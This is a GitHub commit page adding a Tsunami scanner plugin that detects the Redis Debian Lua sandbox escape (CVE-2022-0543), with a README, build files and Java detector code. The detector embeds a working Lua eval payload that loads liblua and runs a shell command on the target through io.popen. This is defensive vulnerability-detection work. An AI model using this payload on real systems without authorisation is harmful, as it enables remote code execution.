-
Notifications
You must be signed in to change notification settings - Fork 191
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Merge pull request #592 from doyensec:CVE-2022-0543
PiperOrigin-RevId: 725777722 Change-Id: I4ce45771c9d9dc964de0a3fcd4f9964c118cb124
- Loading branch information
Showing
6 changed files
with
487 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,29 @@ | ||
# Redis CVE-2022-0543 Vulnerability Detector | ||
|
||
Redis is an open source (BSD licensed), in-memory data structure store, used as | ||
a database, cache, and message broker. | ||
|
||
Reginaldo Silva discovered that due to a packaging issue on Debian/Ubuntu, a | ||
remote attacker with the ability to execute arbitrary Lua scripts could possibly | ||
escape the Lua sandbox and execute arbitrary code on the host. | ||
|
||
References: | ||
|
||
- <https://www.ubercomp.com/posts/2022-01-20_redis_on_debian_rce> | ||
- <https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1005787> | ||
|
||
This detector connects to a remote Redis server using the | ||
[Jedis](https://github.com/redis/jedis) library and sends the payload specified | ||
in https://github.com/vulhub/vulhub/tree/master/redis/CVE-2022-0543. It also | ||
utilizes Tsunami's payload generation framework to generated the Linux shell | ||
command. | ||
|
||
## Build jar file for this plugin | ||
|
||
Using `gradlew`: | ||
|
||
```shell | ||
./gradlew jar | ||
``` | ||
|
||
Tsunami identifiable jar file is located at `build/libs` directory. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,65 @@ | ||
plugins { | ||
id 'java-library' | ||
} | ||
|
||
description = 'Tsunami VulnDetector plugin for Redis CVE-2022-0543 vulnerability.' | ||
group = 'com.google.tsunami' | ||
version = '0.0.1-SNAPSHOT' | ||
|
||
repositories { | ||
maven { // The google mirror is less flaky than mavenCentral() | ||
url 'https://maven-central.storage-download.googleapis.com/repos/central/data/' | ||
} | ||
mavenCentral() | ||
mavenLocal() | ||
} | ||
|
||
java { | ||
sourceCompatibility = JavaVersion.VERSION_11 | ||
targetCompatibility = JavaVersion.VERSION_11 | ||
|
||
jar.manifest { | ||
attributes('Implementation-Title': name, | ||
'Implementation-Version': version, | ||
'Built-By': System.getProperty('user.name'), | ||
'Built-JDK': System.getProperty('java.version'), | ||
'Source-Compatibility': sourceCompatibility, | ||
'Target-Compatibility': targetCompatibility) | ||
} | ||
|
||
javadoc.options { | ||
encoding = 'UTF-8' | ||
use = true | ||
links 'https://docs.oracle.com/javase/8/docs/api/' | ||
} | ||
|
||
// Log stacktrace to console when test fails. | ||
test { | ||
testLogging { | ||
exceptionFormat = 'full' | ||
showExceptions true | ||
showCauses true | ||
showStackTraces true | ||
} | ||
maxHeapSize = '1500m' | ||
} | ||
} | ||
|
||
ext { | ||
tsunamiVersion = '0.0.14' | ||
junitVersion = '4.13' | ||
mockitoVersion = '2.28.2' | ||
truthVersion = '1.0.1' | ||
} | ||
|
||
dependencies { | ||
implementation "com.google.tsunami:tsunami-common:${tsunamiVersion}" | ||
implementation "com.google.tsunami:tsunami-plugin:${tsunamiVersion}" | ||
implementation "com.google.tsunami:tsunami-proto:${tsunamiVersion}" | ||
|
||
testImplementation "junit:junit:${junitVersion}" | ||
testImplementation "org.mockito:mockito-core:${mockitoVersion}" | ||
testImplementation "com.google.truth:truth:${truthVersion}" | ||
testImplementation "com.google.truth.extensions:truth-java8-extension:${truthVersion}" | ||
testImplementation "com.google.truth.extensions:truth-proto-extension:${truthVersion}" | ||
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1 @@ | ||
rootProject.name = 'redis_cve_2022_0543' |
205 changes: 205 additions & 0 deletions
205
...022_0543/src/main/java/com/google/tsunami/plugins/detectors/cves/Cve20220543Detector.java
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,205 @@ | ||
/* | ||
* Copyright 2025 Google LLC | ||
* | ||
* Licensed under the Apache License, Version 2.0 (the "License"); | ||
* you may not use this file except in compliance with the License. | ||
* You may obtain a copy of the License at | ||
* | ||
* http://www.apache.org/licenses/LICENSE-2.0 | ||
* | ||
* Unless required by applicable law or agreed to in writing, software | ||
* distributed under the License is distributed on an "AS IS" BASIS, | ||
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. | ||
* See the License for the specific language governing permissions and | ||
* limitations under the License. | ||
*/ | ||
package com.google.tsunami.plugins.detectors.cves; | ||
|
||
import static com.google.common.base.Preconditions.checkNotNull; | ||
import static com.google.common.collect.ImmutableList.toImmutableList; | ||
import static java.nio.charset.StandardCharsets.UTF_8; | ||
|
||
import com.google.common.annotations.VisibleForTesting; | ||
import com.google.common.collect.ImmutableList; | ||
import com.google.common.flogger.GoogleLogger; | ||
import com.google.common.net.HostAndPort; | ||
import com.google.protobuf.util.Timestamps; | ||
import com.google.tsunami.common.data.NetworkEndpointUtils; | ||
import com.google.tsunami.common.time.UtcClock; | ||
import com.google.tsunami.plugin.PluginType; | ||
import com.google.tsunami.plugin.VulnDetector; | ||
import com.google.tsunami.plugin.annotations.PluginInfo; | ||
import com.google.tsunami.plugin.payload.Payload; | ||
import com.google.tsunami.plugin.payload.PayloadGenerator; | ||
import com.google.tsunami.proto.DetectionReport; | ||
import com.google.tsunami.proto.DetectionReportList; | ||
import com.google.tsunami.proto.DetectionStatus; | ||
import com.google.tsunami.proto.NetworkService; | ||
import com.google.tsunami.proto.PayloadGeneratorConfig; | ||
import com.google.tsunami.proto.Severity; | ||
import com.google.tsunami.proto.TargetInfo; | ||
import com.google.tsunami.proto.Vulnerability; | ||
import com.google.tsunami.proto.VulnerabilityId; | ||
import java.io.BufferedInputStream; | ||
import java.io.BufferedOutputStream; | ||
import java.io.IOException; | ||
import java.net.InetSocketAddress; | ||
import java.net.Socket; | ||
import java.nio.charset.StandardCharsets; | ||
import java.time.Clock; | ||
import java.time.Instant; | ||
import javax.inject.Inject; | ||
import javax.net.SocketFactory; | ||
|
||
/** A VulnDetector plugin for Redis CVE-2022-0543. */ | ||
@PluginInfo( | ||
type = PluginType.VULN_DETECTION, | ||
name = "Redis CVE-2022-0543 Detector", | ||
version = "0.1", | ||
description = "VulnDetector for Redis CVE-2022-0543", | ||
author = "shpei1963 ([email protected])", | ||
bootstrapModule = Cve20220543DetectorBootstrapModule.class) | ||
public final class Cve20220543Detector implements VulnDetector { | ||
|
||
private static final GoogleLogger logger = GoogleLogger.forEnclosingClass(); | ||
|
||
private static final String EXPLOIT_SCRIPT = | ||
"eval \"local io_l = package.loadlib(\\\"%s\\\", \\\"luaopen_io\\\"); local io = io_l();" | ||
+ " local f = io.popen(\\\"%s\\\", \\\"r\\\"); local res = f:read(\\\"*a\\\"); f:close();" | ||
+ " return res\" 0\n"; | ||
private static final ImmutableList<String> LIB_LUA_PATHES = | ||
ImmutableList.of("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0"); | ||
|
||
@VisibleForTesting | ||
static final String TITLE = "Redis Lua Sandbox Escape and Remote Code Execution (CVE-2022-0543)"; | ||
|
||
@VisibleForTesting | ||
static final String DESCRIPTION = | ||
"Redis is an open source (BSD licensed), in-memory data structure store, used as a database," | ||
+ " cache, and message broker. Due to a packaging issue, Redis is prone to a" | ||
+ " (Debian-specific) Lua sandbox escape, which could result in remote code execution."; | ||
|
||
@VisibleForTesting | ||
static final String RECOMMENDATION = | ||
"Upgrade Redis to a fixed version based on" | ||
+ " https://security-tracker.debian.org/tracker/CVE-2022-0543"; | ||
|
||
private final Clock utcClock; | ||
private final SocketFactory socketFactory; | ||
private final PayloadGenerator payloadGenerator; | ||
final int connectTimeout = 5000; | ||
final int readTimeout = 2000; | ||
|
||
@Inject | ||
Cve20220543Detector( | ||
@UtcClock Clock utcClock, SocketFactory socketFactory, PayloadGenerator payloadGenerator) { | ||
this.utcClock = checkNotNull(utcClock); | ||
this.socketFactory = checkNotNull(socketFactory); | ||
this.payloadGenerator = checkNotNull(payloadGenerator); | ||
} | ||
|
||
@Override | ||
public DetectionReportList detect( | ||
TargetInfo targetInfo, ImmutableList<NetworkService> matchedServices) { | ||
logger.atInfo().log("Cve20220543Detector starts detecting."); | ||
|
||
return DetectionReportList.newBuilder() | ||
.addAllDetectionReports( | ||
matchedServices.stream() | ||
.filter(this::isRedisService) | ||
.filter(this::isServiceVulnerable) | ||
.map(networkService -> buildDetectionReport(targetInfo, networkService)) | ||
.collect(toImmutableList())) | ||
.build(); | ||
} | ||
|
||
private boolean isRedisService(NetworkService networkService) { | ||
return networkService.getServiceName().equals("redis"); | ||
} | ||
|
||
private boolean isServiceVulnerable(NetworkService networkService) { | ||
Socket socket = null; | ||
BufferedOutputStream out = null; | ||
BufferedInputStream in = null; | ||
|
||
// Create socket and connect | ||
HostAndPort target = NetworkEndpointUtils.toHostAndPort(networkService.getNetworkEndpoint()); | ||
try { | ||
socket = socketFactory.createSocket(); | ||
socket.connect(new InetSocketAddress(target.getHost(), target.getPort()), connectTimeout); | ||
socket.setSoTimeout(readTimeout); | ||
|
||
out = new BufferedOutputStream(socket.getOutputStream()); | ||
in = new BufferedInputStream(socket.getInputStream()); | ||
} catch (IOException e) { | ||
} | ||
|
||
boolean isVulnerable = true; | ||
// Detect | ||
try { | ||
for (String luaPath : LIB_LUA_PATHES) { | ||
PayloadGeneratorConfig config = | ||
PayloadGeneratorConfig.newBuilder() | ||
.setVulnerabilityType(PayloadGeneratorConfig.VulnerabilityType.REFLECTIVE_RCE) | ||
.setInterpretationEnvironment( | ||
PayloadGeneratorConfig.InterpretationEnvironment.LINUX_SHELL) | ||
.setExecutionEnvironment( | ||
PayloadGeneratorConfig.ExecutionEnvironment.EXEC_INTERPRETATION_ENVIRONMENT) | ||
.build(); | ||
|
||
// curl is not installed on the tested docker composes, as this is a REFLECTIVE_RCE fallback | ||
// to the printf payload by default | ||
Payload payload = this.payloadGenerator.generateNoCallback(config); | ||
String script = String.format(EXPLOIT_SCRIPT, luaPath, payload.getPayload()); | ||
|
||
out.write(script.getBytes(UTF_8)); | ||
out.flush(); | ||
|
||
// we assume that the response from callback server is less than 2048 | ||
byte[] buffer = new byte[2048]; | ||
|
||
int b = in.read(buffer, 0, buffer.length); | ||
if (b < 1) { | ||
throw new IOException("Unexpected end of stream"); | ||
} | ||
|
||
isVulnerable = payload.checkIfExecuted(new String(buffer, StandardCharsets.UTF_8)); | ||
if (isVulnerable) { | ||
break; | ||
} | ||
} | ||
|
||
} catch (IOException e) { | ||
logger.atWarning().withCause(e).log("Cannot execute exploit."); | ||
return false; | ||
} | ||
|
||
try { | ||
// Clean up | ||
socket.close(); | ||
} catch (IOException e) { | ||
} | ||
|
||
return isVulnerable; | ||
} | ||
|
||
private DetectionReport buildDetectionReport( | ||
TargetInfo targetInfo, NetworkService vulnerableNetworkService) { | ||
return DetectionReport.newBuilder() | ||
.setTargetInfo(targetInfo) | ||
.setNetworkService(vulnerableNetworkService) | ||
.setDetectionTimestamp(Timestamps.fromMillis(Instant.now(utcClock).toEpochMilli())) | ||
.setDetectionStatus(DetectionStatus.VULNERABILITY_VERIFIED) | ||
.setVulnerability( | ||
Vulnerability.newBuilder() | ||
.setMainId( | ||
VulnerabilityId.newBuilder() | ||
.setPublisher("TSUNAMI_COMMUNITY") | ||
.setValue("CVE_2022_0543")) | ||
.setSeverity(Severity.CRITICAL) | ||
.setTitle(TITLE) | ||
.setDescription(DESCRIPTION) | ||
.setRecommendation(RECOMMENDATION)) | ||
.build(); | ||
} | ||
} |
33 changes: 33 additions & 0 deletions
33
...in/java/com/google/tsunami/plugins/detectors/cves/Cve20220543DetectorBootstrapModule.java
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,33 @@ | ||
/* | ||
* Copyright 2025 Google LLC | ||
* | ||
* Licensed under the Apache License, Version 2.0 (the "License"); | ||
* you may not use this file except in compliance with the License. | ||
* You may obtain a copy of the License at | ||
* | ||
* http://www.apache.org/licenses/LICENSE-2.0 | ||
* | ||
* Unless required by applicable law or agreed to in writing, software | ||
* distributed under the License is distributed on an "AS IS" BASIS, | ||
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. | ||
* See the License for the specific language governing permissions and | ||
* limitations under the License. | ||
*/ | ||
package com.google.tsunami.plugins.detectors.cves; | ||
|
||
import com.google.inject.multibindings.OptionalBinder; | ||
import com.google.tsunami.plugin.PluginBootstrapModule; | ||
import javax.net.SocketFactory; | ||
|
||
/** A Guice module that bootstraps the {@link Cve20220543Detector}. */ | ||
public final class Cve20220543DetectorBootstrapModule extends PluginBootstrapModule { | ||
|
||
@Override | ||
protected void configurePlugin() { | ||
OptionalBinder.newOptionalBinder(binder(), SocketFactory.class) | ||
.setDefault() | ||
.toInstance(SocketFactory.getDefault()); | ||
|
||
registerPlugin(Cve20220543Detector.class); | ||
} | ||
} |
Oops, something went wrong.